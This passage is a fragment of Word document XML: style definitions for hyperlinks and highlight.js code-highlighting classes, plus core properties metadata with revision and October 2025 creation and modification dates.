    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00015895"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="relative">
    <w:name w:val="relative"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00015895"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="not-prose">
    <w:name w:val="not-prose"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00015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operator">
    <w:name w:val="hljs-operator"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00015895"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0034322B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0034322B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-title">
    <w:name w:val="hljs-title"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0034322B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-subst">
    <w:name w:val="hljs-subst"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00343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10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7</cp:revision>
  <cp:lastPrinted>2025-10-27T13:19:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-26T15:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-28T06:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>